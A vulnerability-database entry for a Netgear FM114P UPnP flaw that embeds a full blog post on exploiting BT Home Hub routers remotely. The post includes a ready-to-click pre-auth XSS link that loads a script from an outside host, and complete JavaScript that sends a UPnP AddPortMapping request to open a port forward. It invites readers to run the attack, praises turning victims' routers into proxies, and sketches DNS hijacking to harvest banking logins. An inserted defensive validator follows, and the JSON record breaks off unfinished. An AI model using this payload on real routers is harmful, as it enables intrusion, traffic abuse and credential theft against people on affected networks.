VAR-200304-0138
Vulnerability from variot - Updated: 2022-05-17 22:39
Netgear FM114P ProSafe is a wireless network router. The Netgear FM114P ProSafe wireless network router has a vulnerability when using the UPnP feature, which can be exploited by remote attackers to obtain WAN interface username and password information. If the remote access and UPnP functions are enabled on the device, the remote user can verify the username and password information for the Netgear FM114P ProSafe connection, which can be obtained by submitting a UPnP SOAP request to the WAN interface.
http://www.gnucitizen.org/blog/bt-home-flub-pwnin-the-bt-home-hub-5
It's known that UPnP [1] is inherently insecure for a very simple reason: administrative tasks can be performed on an Internet Gateway Device (IGD) without needing to know the admin password whatsoever! This on its own is quite scary and I personally feel that although there is some research in the public domain, there is much more attention that needs to be paid to UPnP.
UPnP allows you to perform administrative functions. Some functions are very standardized and supported by most devices. Examples include obtaining network settings, and enabling port forwarding rules. Other functions are make/model specific. Some very scary functions such as obtaining administrative username and password pairs have been reported [2] in the past. As a reminder, this works without submitting any administrative password whatsoever since UPnP is an authenticationless protocol. On top of this, most IGDs support UPnP by default.
After having read several UPnP security research materials I realized that all the described attacks assume that the attacker (be it human or malware) comes from inside the network. This post describes how to exploit IGDs remotely via UPnP even when no services are publicly available (WAN interface).
** Preauth XSS + SOAP payload = remote UPnP exploitation **
If you sniff yourself while running software that uses UPnP in the background to help you configure your router, you'll see that UPnP is nothing more than SOAP. Our AJAX knowledge tells us about a feature that allows us to craft arbitrary XML requests: the XMLHttpRequest [3] object. Trouble is, such object can only be used within the context of the site that the requests are submitted to. So if we host the malicious scripting code on a third-party site, and a victim user located in the same LAN as the target IGD visits such page, the request wouldn't go through due to XMLHttpRequest same-origin policy restriction. Or put in a different way: you aren't allowed to make XMLHttpRequests to any server except the server where your web page came from.
However, if you find a pre-auth XSS vulnerability [4] on the target device you can bypass such restriction. For instance, many devices such as the BT Home Hub and Speedtouch routers offer certain pages before authenticating. Some of these pages are cgi scripts which are vulnerable to XSS. Although offering certain "useless" functionalities before logging into the router might not seem like a big deal, it can actually lead to UPnP being exploited remotely, even if the web admin console is not visible from the Internet!
The following is a non-malicious proof-of-concept exploit which sets up a port-forwarding rule from port 1337 on the WAN interface to port 445 on the internal IP address 192.168.1.64. Such IP address is the first usable IP address reserved for clients connected to Speedtouch and BT Home Hub routers. The exploit has been tested on BT Home Hub - Firmware version 6.2.6.B. Just to make things clear, UPnP is enabled by default on the BT Home Hub, just like most IGDs. If your Internet gateway is a BT Home Hub, clicking on the following link should add a new forward rule called EVILFORWARDRULE: ATTACK http://192.168.1.254/cgi/b/ic/connect/?url=%22%3e%3cscript%20src='http://www.gnucitizen.org/projects/bt-home-flub-pwnin-the-bt-home-hub-5/payload.xss'%3e%3c/script%3e%3ca%20b=
In order to check if the port-forwarding rule was added successfully you can use UPnP Port Forwarding Utility [5] and simply click on "Update list now" after the device has been discovered (device name should show on the top-left corner a few seconds later after launching the tool). You could of course use the technique and code explained in this post on any Internet gateway that supports UPnP and is vulnerable to a preauth XSS vulnerability. If you manage to successfully test this attack on the BT Home Hub or any other device please let us know!
** Zombie routers and the unvalidated NewInternalClient bug **
A bit more UPnP hacking led me to realize that the BT Home Hub is vulnerable to the (in)famous unvalidated NewInternalClient bug. This bug allows you to choose external IP addresses instead of LAN IP addresses as intended when setting up port-forwarding rules via UPnP. In this case, I reused the previous code and changed the internal IP address (192.168.1.64) in the NewInternalClient tag with the IP address of a random Internet web server and the value of the NewInternalPort tag to 80. This effectively allows an attacker to use the vulnerable BT Home Hub router as a proxy - aka onion router. In other words, when probing the router's NATed IP address on port 1337, the attacker is effectively probing the IP address and port number specified by the port-forwarding rule - except the router's IP address would be shown in logs of the target web server, as opposed to the attacker's real IP address. I thought this is a nice real example of how a vulnerable router can be used as a zombie by simply having a user visit a page with malicious scripting (XSS + UPnP SOAP request). Imagine running your favourite vulnerability scanner against a target site, while using the victim user's router as a proxy - sweet!
There are other UPnP functionalities besides port forwarding rules that look potentially interesting from a hacking point of view. For instance, SetDNSServer [6] allows you to guess what, set the gateway's DNS server. Imagine someone changing your router's DNS server setting by simply visiting a webpage. After that you visit yourfavoritebank.com and guess what, you're actually visiting a malicious server that is harvesting all your banking login details! I'll leave the exercise of writing a remote UPnP exploit that changes the DNS server setting on the BT Home Hub (or any other vulnerable router) to the reader.
** About GNUCITIZEN **
GNUCITIZEN is a Cutting Edge, Ethical Hacker Outfit, Information Think Tank, which primarily deals with all aspects of the art of hacking. Our work has been featured in established magazines and information portals, such as Wired, Eweek, The Register, PC Week, IDG, BBC and many others. The members of the GNUCITIZEN group are well known and well established experts in the Information Security, Black Public Relations (PR) Industries and Hacker Circles with widely recognized experience in the government and corporate sectors and the open source community.
GNUCITIZEN is an ethical, white-hat organization that doesn't hide anything. We strongly believe that knowledge belongs to everyone and we make everything to ensure that our readers have access to the latest cutting-edge research and get alerted of the newest security threats when they come. Our experience shows that the best way of protection is the mass information. And we mean that literally!!! It is in the public's best interest to make our findings accessible to vast majority of people, simply because it is proven that the more people know about a certain problem, the better.
[1] http://www.upnp.org/resources/whitepapers.asp
[2] http://www.securityfocus.com/bid/7267/discuss
[3] http://www.w3.org/TR/XMLHttpRequest/
[4] http://www.gnucitizen.org/blog/bt-home-flub-pwnin-the-bt-home-hub-4
[5] http://www.codeproject.com/KB/IP/PortForward.aspx
[6] http://www-adele.imag.fr/users/Didier.Donsez/dev/osgi/upnpgendevice/api/fr/imag/adele/bundle/upnp/igd/model/LANHostConfigManagementModel.html#setDNSServer(java.lang.String)
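// http://www.gnucitizen.org/projects/bt-home-flub-pwnin-the-bt-home-hub-5/payload.xss
var req;
// UPnP control URL of the WAN PPP connection service on the gateway
var url = "/upnp/control/igd/wanpppcInternet";

function loadXMLDoc(url) {
    req = false;
    // branch for native XMLHttpRequest object
    if (window.XMLHttpRequest && !(window.ActiveXObject)) {
        try {
            req = new XMLHttpRequest();
        } catch (e) {
            req = false;
        }
    // branch for IE/Windows ActiveX version
    } else if (window.ActiveXObject) {
        try {
            req = new ActiveXObject("Msxml2.XMLHTTP");
        } catch (e) {
            try {
                req = new ActiveXObject("Microsoft.XMLHTTP");
            } catch (e) {
                req = false;
            }
        }
    }
    if (req) {
        req.onreadystatechange = processReqChange;
        req.open("POST", url, true);
        req.setRequestHeader('SOAPAction',
            '"urn:schemas-upnp-org:service:WANPPPConnection:1#AddPortMapping"');

        // SOAP body of the AddPortMapping action: WAN port 1337 -> 192.168.1.64:445
        req.send('<?xml version="1.0"?>' +
            '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" ' +
            'SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">' +
            '<SOAP-ENV:Body>' +
            '<m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANPPPConnection:1">' +
            '<NewRemoteHost xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string"></NewRemoteHost>' +
            '<NewExternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui2">1337</NewExternalPort>' +
            '<NewProtocol xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">TCP</NewProtocol>' +
            '<NewInternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui2">445</NewInternalPort>' +
            '<NewInternalClient xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">192.168.1.64</NewInternalClient>' +
            '<NewEnabled xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="boolean">1</NewEnabled>' +
            '<NewPortMappingDescription xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">EVILFORWARDRULE</NewPortMappingDescription>' +
            '<NewLeaseDuration xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui4">0</NewLeaseDuration>' +
            '</m:AddPortMapping>' +
            '</SOAP-ENV:Body>' +
            '</SOAP-ENV:Envelope>');
    }
}

function processReqChange() {
    // only if req shows "loaded"
    if (req.readyState == 4) {
        // only if "OK"
        if (req.status == 200) {
            // ...processing statements go here...
            //alert(req.responseText);
        } else {
            alert("There was a problem retrieving the XML data:\n" + req.statusText);
        }
    }
}

loadXMLDoc(url);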
-- pagvac gnucitizen.org, ikwt.com
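A gateway-side check for the unvalidated NewInternalClient bug described in the post above, as an added example that is not part of the original post or of any vendor firmware: it parses an AddPortMapping SOAP body and accepts the mapping only when NewInternalClient is a LAN address and is the requesting host itself. The function names, the 192.168.1.0/24 LAN, the reason strings and the sample requests are assumptions constructed for illustration.

```javascript
// Added example: validation an IGD could apply to UPnP AddPortMapping requests.
// All names, the LAN range and the sample bodies are constructed for illustration.

// Convert a dotted-quad IPv4 string to an unsigned 32-bit number, or null if malformed.
function ipv4ToInt(ip) {
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(ip);
  if (!m) return null;
  let n = 0;
  for (let i = 1; i <= 4; i++) {
    const octet = Number(m[i]);
    if (octet > 255) return null;
    n = n * 256 + octet;
  }
  return n;
}

// True when ip lies inside cidr, e.g. "192.168.1.0/24".
function inCidr(ip, cidr) {
  const [base, bitsStr] = cidr.split("/");
  const bits = Number(bitsStr);
  const a = ipv4ToInt(ip);
  const b = ipv4ToInt(base);
  if (a === null || b === null || !(bits >= 0 && bits <= 32)) return false;
  const size = Math.pow(2, 32 - bits);
  return Math.floor(a / size) === Math.floor(b / size);
}

// Extract one SOAP argument; attributes on the element (dt:dt=...) are tolerated.
function soapArg(body, name) {
  const re = new RegExp("<" + name + "(?:\\s[^>]*)?>([^<]*)</" + name + ">");
  const m = re.exec(body);
  return m ? m[1].trim() : null;
}

// Decide whether a mapping request may be installed.
// requesterIp is the source address of the HTTP connection carrying the request.
function validateAddPortMapping(body, requesterIp, lanCidr) {
  const client = soapArg(body, "NewInternalClient");
  // Policy assumption: only literal IPv4 addresses are accepted, never hostnames.
  if (client === null || ipv4ToInt(client) === null) {
    return { ok: false, reason: "bad-client" };
  }
  // The check the post says is missing: the target must be on the LAN.
  if (!inCidr(client, lanCidr)) {
    return { ok: false, reason: "not-on-lan" };
  }
  // Stricter policy: a host may only open ports towards itself.
  if (ipv4ToInt(client) !== ipv4ToInt(requesterIp)) {
    return { ok: false, reason: "not-requester" };
  }
  for (const tag of ["NewExternalPort", "NewInternalPort"]) {
    const raw = soapArg(body, tag);
    const port = raw !== null && /^\d{1,5}$/.test(raw) ? Number(raw) : 0;
    if (port < 1 || port > 65535) return { ok: false, reason: "bad-port" };
  }
  const proto = soapArg(body, "NewProtocol");
  if (proto !== "TCP" && proto !== "UDP") {
    return { ok: false, reason: "bad-protocol" };
  }
  return { ok: true, reason: "accepted" };
}

// Constructed sample request bodies (shortened form of an AddPortMapping call).
function sampleBody(internalClient, internalPort) {
  return '<?xml version="1.0"?>' +
    '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>' +
    '<m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANPPPConnection:1">' +
    '<NewRemoteHost></NewRemoteHost>' +
    '<NewExternalPort>1337</NewExternalPort>' +
    '<NewProtocol>TCP</NewProtocol>' +
    '<NewInternalPort dt:dt="ui2">' + internalPort + '</NewInternalPort>' +
    '<NewInternalClient dt:dt="string">' + internalClient + '</NewInternalClient>' +
    '<NewEnabled>1</NewEnabled>' +
    '</m:AddPortMapping></s:Body></s:Envelope>';
}

// Run the validator over three constructed requests sent by host 192.168.1.64.
function demo() {
  const lan = "192.168.1.0/24";
  const from = "192.168.1.64";
  return [
    validateAddPortMapping(sampleBody("192.168.1.64", 445), from, lan).reason,
    validateAddPortMapping(sampleBody("203.0.113.10", 80), from, lan).reason,
    validateAddPortMapping(sampleBody("192.168.1.70", 445), from, lan).reason,
  ];
}

console.log(demo());
```

A request that maps a port to the requesting host's own LAN address passes both checks, so this validation closes the proxy abuse only; the pre-auth XSS that lets a web page issue the request still has to be fixed separately.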
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200304-0138",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "fwag114 1.0.26rc4",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "fm114p",
"scope": null,
"trust": 0.3,
"vendor": "netgear",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-0958"
},
{
"db": "BID",
"id": "7267"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Discovery is credited to Bj\u00f6rn Stickler \u003cstickler@rbg.informatik.tu-darmstadt.de\u003e.",
"sources": [
{
"db": "BID",
"id": "7267"
}
],
"trust": 0.3
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2003-0958",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "CNVD",
"id": "CNVD-2003-0958",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-0958"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear FM114P ProSafe is a wireless network router. The Netgear FM114P ProSafe wireless network router has a vulnerability when using the UPnP feature, which can be exploited by remote attackers to obtain WAN interface username and password information. If the remote access and UPnP functions are enabled on the device, the remote user can verify the username and password information for the Netgear FM114P ProSafe connection, which can be obtained by submitting a UPnP soap request to the WAN interface. http://www.gnucitizen.org/blog/bt-home-flub-pwnin-the-bt-home-hub-5\n\nIt\u0027s known that UPnP [1] is inherently insecure for a very simple\nreason: administrative tasks can be performed on a Internet Gateway\nDevice (IGD) without needing to know the admin password whatsoever!\nThis on its own is quite scary and I personally feel that although\nthere is some research in the public domain, there is much more\nattention that needs to be paid to UPnP. \n\nUPnP allows you to perform administrative functions. Some functions\nare very standardized and supported by most devices. Examples include\nobtaining network settings, and enabling port forwarding rules. Other\nfunctions are make/model specific. Some very scary functions such as\nobtaining administrative username and password pairs have been\nreported [2] in the past. As a reminder, this works without submitting\nany administrative password whatsoever since UPnP is a\nauthenticationless protocol. On top of this, most IGDs support UPnP by\ndefault. \n\nAfter having read several UPnP security research materials I realized\nthat all the described attacks assume that the attacker (be it human\nor malware) comes from inside the network. This post describes how to\nexploit IGDs remotely via UPnP even when no services are publicly\navailable (WAN interface). 
\n\n\n** Preauth XSS + SOAP payload = remote UPnP exploitation **\n\nIf you sniff yourself while running software that uses UPnP in the\nbackground to help you configure your router, you\u0027ll see that UPnP is\nnothing more than SOAP. Our AJAX knowledge tells us about a feature\nthat allows us to craft arbitrary XML requests: the XMLHttpRequest [3]\nobject. Trouble is, such object can only be used within the context of\nthe site that the requests are submitted to. So if we host the\nmalicious scripting code on a third-party site, and a victim user\nlocated in the same LAN as the target IGD visits such page, the\nrequest wouldn\u0027t go through due to XMLHttpRequest same-origin policy\nrestricition. Or put in a different way: you aren\u0027t allowed to make\nXMLHttpRequests to any server except the server where your web page\ncame from. \n\nHowever, if you find a pre-auth XSS vulnerability [4] on the target\ndevice you can bypass such restriction. For instance, many devices\nsuch as the BT Home Hub and Speedtouch routers offer certain pages\nbefore authenticating. Some of these pages are cgi scripts which are\nvulnerable to XSS. Although offering certain \"useless\" functionalities\nbefore logging into the router might not seem like a big deal, it can\nactually lead to UPnP being exploited remotely, even if the web admin\nconsole is not visible from the Internet!\n\nThe following is a non-malicious proof-of-concept exploit which sets\nup a port-forwarding rule from port 1337 on the WAN interface to port\n445 on the internal IP address 192.168.1.64. Such IP address is the\nfirst usable IP address reserved for clients connected to Speedtouch\nand BT Home Hub routers. The exploit has been tested on BT Home Hub -\nFirmware version 6.2.6.B. Just to make things clear, UPnP is enabled\nby default on the BT Home Hub, just like most IGDs. 
If your Internet\ngateway is a BT Home Hub, clicking on the following link should add a\nnew forward rule called EVILFORWARDRULE: ATTACK\n\u003chttp://192.168.1.254/cgi/b/ic/connect/?url=%22%3e%3cscript%20src=\u0027http://www.gnucitizen.org/projects/bt-home-flub-pwnin-the-bt-home-hub-5/payload.xss\u0027%3e%3c/script%3e%3ca%20b=\u003e\n\nIn order to check if the port-forwarding rule was added successfully\nyou can use UPnP Port Forwarding Utility [5] and simply click on\n\"Update list now\" after the device has been discovered (device name\nshould show on the top-left corner a few seconds later after launching\nthe tool). You could of course use the technique and code explained in\nthis post on any Internet gateway that supports UPnP and is a\nvulnerable to a preauth XSS vulnerability. If you manage to\nsuccessfully test this attack on the BT Home Hub or any other device\nplease let us know!\n\n\n** Zombie routers and the unvalidated NewInternalClient bug **\n\nA bit of more UPnP hacking lead me to realize that the BT Home Hub is\nvulnerable to the (in)famous unvalidated NewInternalClient bug. This\nbug allows you to choose external IP addresses instead of a LAN IP\naddresses as intended when setting up port-forwarding rules via UPnP. \nIn this case, I reused the previous code and changed the internal IP\naddress (192.168.1.64) in the NewInternalClient tag with the IP\naddress of a random Internet web server and the value of the\nNewInternalPort tag to 80. This effectively allows an attacker to use\nthe vulnerable BT Home Hub router as a proxy - aka onion router. In\nother words, when probing the router\u0027s NATed IP address on port 1337,\nthe attacker is effectively probing the IP address and port number\nspecified by the port-forwarding rule - except the routers IP address\nwould be shown in logs of the target web server, as opposed to the\nattacker\u0027s real IP address. 
I thought this is a nice real example of\nhow a vulnerable router can be used as a zombie by simply having a\nuser visit a page with malicious scripting (XSS + UPnP SOAP request). \nImagine running your favourite vulnerability scanner against a target\nsite, while using the victim user\u0027s router as a proxy - sweet!\n\nThere are other UPnP functionalities besides port forwarding rules\nthat look potentially interesting from a hacking point of view. For\ninstance, SetDNSServer [6] allows you to guess what, set the gateway\u0027s\nDNS server. Imagine someone changing your router\u0027s DNS server setting\nby simply visiting a webpage. After that you visit\nyourfavoritebank.com and guess what, you\u0027re actually visiting a\nmalicious server that is harvesting all your banking login details!\nI\u0027ll leave the exercise of writing a remote UPnP exploit that changes\nthe DNS server setting on the BT Home Hub (or any other vulnerable\nrouter) to the reader. \n\n\n** About GNUCITIZEN **\n\nGNUCITIZEN is a Cutting Edge, Ethical Hacker Outfit, Information Think\nTank, which primarily deals with all aspects of the art of hacking. \nOur work has been featured in established magazines and information\nportals, such as Wired, Eweek, The Register, PC Week, IDG, BBC and\nmany others. The members of the GNUCITIZEN group are well known and\nwell established experts in the Information Security, Black Public\nRelations (PR) Industries and Hacker Circles with widely recognized\nexperience in the government and corporate sectors and the open source\ncommunity. \n\nGNUCITIZEN is an ethical, white-hat organization that doesn\u0027t hide\nanything. We strongly believe that knowledge belongs to everyone and\nwe make everything to ensure that our readers have access to the\nlatest cutting-edge research and get alerted of the newest security\nthreats when they come. Our experience shows that the best way of\nprotection is the mass information. And we mean that literally!!! 
It\nis in the public\u0027s best interest to make our findings accessible to\nvast majority of people, simply because it is proven that the more\npeople know about a certain problem, the better. \n\n\n[1] http://www.upnp.org/resources/whitepapers.asp\n[2] http://www.securityfocus.com/bid/7267/discuss\n[3] http://www.w3.org/TR/XMLHttpRequest/\n[4] http://www.gnucitizen.org/blog/bt-home-flub-pwnin-the-bt-home-hub-4\n[5] http://www.codeproject.com/KB/IP/PortForward.aspx\n[6] http://www-adele.imag.fr/users/Didier.Donsez/dev/osgi/upnpgendevice/api/fr/imag/adele/bundle/upnp/igd/model/LANHostConfigManagementModel.html#setDNSServer(java.lang.String)\n\n\n\n// http://www.gnucitizen.org/projects/bt-home-flub-pwnin-the-bt-home-hub-5/payload.xss\nvar req;\nvar url=\"/upnp/control/igd/wanpppcInternet\";\n\nfunction loadXMLDoc(url) {\n\treq = false;\n // branch for native XMLHttpRequest object\n if(window.XMLHttpRequest \u0026\u0026 !(window.ActiveXObject)) {\n \ttry {\n\t\t\treq = new XMLHttpRequest();\n } catch(e) {\n\t\t\treq = false;\n }\n // branch for IE/Windows ActiveX version\n } else if(window.ActiveXObject) {\n \ttry {\n \treq = new ActiveXObject(\"Msxml2.XMLHTTP\");\n \t} catch(e) {\n \ttry {\n \t\treq = new ActiveXObject(\"Microsoft.XMLHTTP\");\n \t} catch(e) {\n \t\treq = false;\n \t}\n\t\t}\n }\n\tif(req) {\n\t\treq.onreadystatechange = processReqChange;\n\t\treq.open(\"POST\", url, true);\n\t\treq.setRequestHeader(\u0027SOAPAction\u0027,\n\u0027\"urn:schemas-upnp-org:service:WANPPPConnection:1#AddPortMapping\"\u0027);\n\n\t\treq.send(\u0027\u003c?xml 
version=\"1.0\"?\u003e\u003cSOAP-ENV:Envelope\nxmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"\nSOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\u003e\u003cSOAP-ENV:Body\u003e\u003cm:AddPortMapping\nxmlns:m=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"\u003e\u003cNewRemoteHost\nxmlns:dt=\"urn:schemas-microsoft-com:datatypes\"\ndt:dt=\"string\"\u003e\u003c/NewRemoteHost\u003e\u003cNewExternalPort\nxmlns:dt=\"urn:schemas-microsoft-com:datatypes\"\ndt:dt=\"ui2\"\u003e1337\u003c/NewExternalPort\u003e\u003cNewProtocol\nxmlns:dt=\"urn:schemas-microsoft-com:datatypes\"\ndt:dt=\"string\"\u003eTCP\u003c/NewProtocol\u003e\u003cNewInternalPort\nxmlns:dt=\"urn:schemas-microsoft-com:datatypes\"\ndt:dt=\"ui2\"\u003e445\u003c/NewInternalPort\u003e\u003cNewInternalClient\nxmlns:dt=\"urn:schemas-microsoft-com:datatypes\"\ndt:dt=\"string\"\u003e192.168.1.64\u003c/NewInternalClient\u003e\u003cNewEnabled\nxmlns:dt=\"urn:schemas-microsoft-com:datatypes\"\ndt:dt=\"boolean\"\u003e1\u003c/NewEnabled\u003e\u003cNewPortMappingDescription\nxmlns:dt=\"urn:schemas-microsoft-com:datatypes\"\ndt:dt=\"string\"\u003eEVILFORWARDRULE\u003c/NewPortMappingDescription\u003e\u003cNewLeaseDuration\nxmlns:dt=\"urn:schemas-microsoft-com:datatypes\"\ndt:dt=\"ui4\"\u003e0\u003c/NewLeaseDuration\u003e\u003c/m:AddPortMapping\u003e\u003c/SOAP-ENV:Body\u003e\u003c/SOAP-ENV:Envelope\u003e\u0027);\n\t}\n}\n\nfunction processReqChange() {\n // only if req shows \"loaded\"\n if (req.readyState == 4) {\n // only if \"OK\"\n if (req.status == 200) {\n // ...processing statements go here... \n\t\t//alert(req.responseText);\n } else {\n alert(\"There was a problem retrieving the XML data:\\n\" +\nreq.statusText);\n }\n }\n}\n\n\nloadXMLDoc(url);\n\n-- \npagvac\ngnucitizen.org, ikwt.com\n",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-0958"
},
{
"db": "BID",
"id": "7267"
},
{
"db": "PACKETSTORM",
"id": "62502"
}
],
"trust": 0.9
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "7267",
"trust": 1.0
},
{
"db": "CNVD",
"id": "CNVD-2003-0958",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "62502",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-0958"
},
{
"db": "BID",
"id": "7267"
},
{
"db": "PACKETSTORM",
"id": "62502"
}
]
},
"id": "VAR-200304-0138",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-0958"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-0958"
}
]
},
"last_update_date": "2022-05-17T22:39:13.925000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://marc.theaimsgroup.com/?l=bugtraq\u0026m=104940655818917\u0026w=2"
},
{
"trust": 0.3,
"url": "/archive/1/317353"
},
{
"trust": 0.1,
"url": "http://www.w3.org/tr/xmlhttprequest/"
},
{
"trust": 0.1,
"url": "http://www-adele.imag.fr/users/didier.donsez/dev/osgi/upnpgendevice/api/fr/imag/adele/bundle/upnp/igd/model/lanhostconfigmanagementmodel.html#setdnsserver(java.lang.string)"
},
{
"trust": 0.1,
"url": "http://www.gnucitizen.org/projects/bt-home-flub-pwnin-the-bt-home-hub-5/payload.xss"
},
{
"trust": 0.1,
"url": "http://www.upnp.org/resources/whitepapers.asp"
},
{
"trust": 0.1,
"url": "http://www.gnucitizen.org/blog/bt-home-flub-pwnin-the-bt-home-hub-4"
},
{
"trust": 0.1,
"url": "http://192.168.1.254/cgi/b/ic/connect/?url=%22%3e%3cscript%20src=\u0027http://www.gnucitizen.org/projects/bt-home-flub-pwnin-the-bt-home-hub-5/payload.xss\u0027%3e%3c/script%3e%3ca%20b=\u003e"
},
{
"trust": 0.1,
"url": "http://schemas.xmlsoap.org/soap/envelope/\""
},
{
"trust": 0.1,
"url": "http://www.securityfocus.com/bid/7267/discuss"
},
{
"trust": 0.1,
"url": "http://www.gnucitizen.org/blog/bt-home-flub-pwnin-the-bt-home-hub-5"
},
{
"trust": 0.1,
"url": "http://www.codeproject.com/kb/ip/portforward.aspx"
},
{
"trust": 0.1,
"url": "http://schemas.xmlsoap.org/soap/encoding/\"\u003e\u003csoap-env:body\u003e\u003cm:addportmapping"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2003-0958"
},
{
"db": "BID",
"id": "7267"
},
{
"db": "PACKETSTORM",
"id": "62502"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2003-0958"
},
{
"db": "BID",
"id": "7267"
},
{
"db": "PACKETSTORM",
"id": "62502"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2003-04-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2003-0958"
},
{
"date": "2003-04-03T00:00:00",
"db": "BID",
"id": "7267"
},
{
"date": "2008-01-10T22:57:43",
"db": "PACKETSTORM",
"id": "62502"
}
]
},
"sources_update_date": {
"@context": {
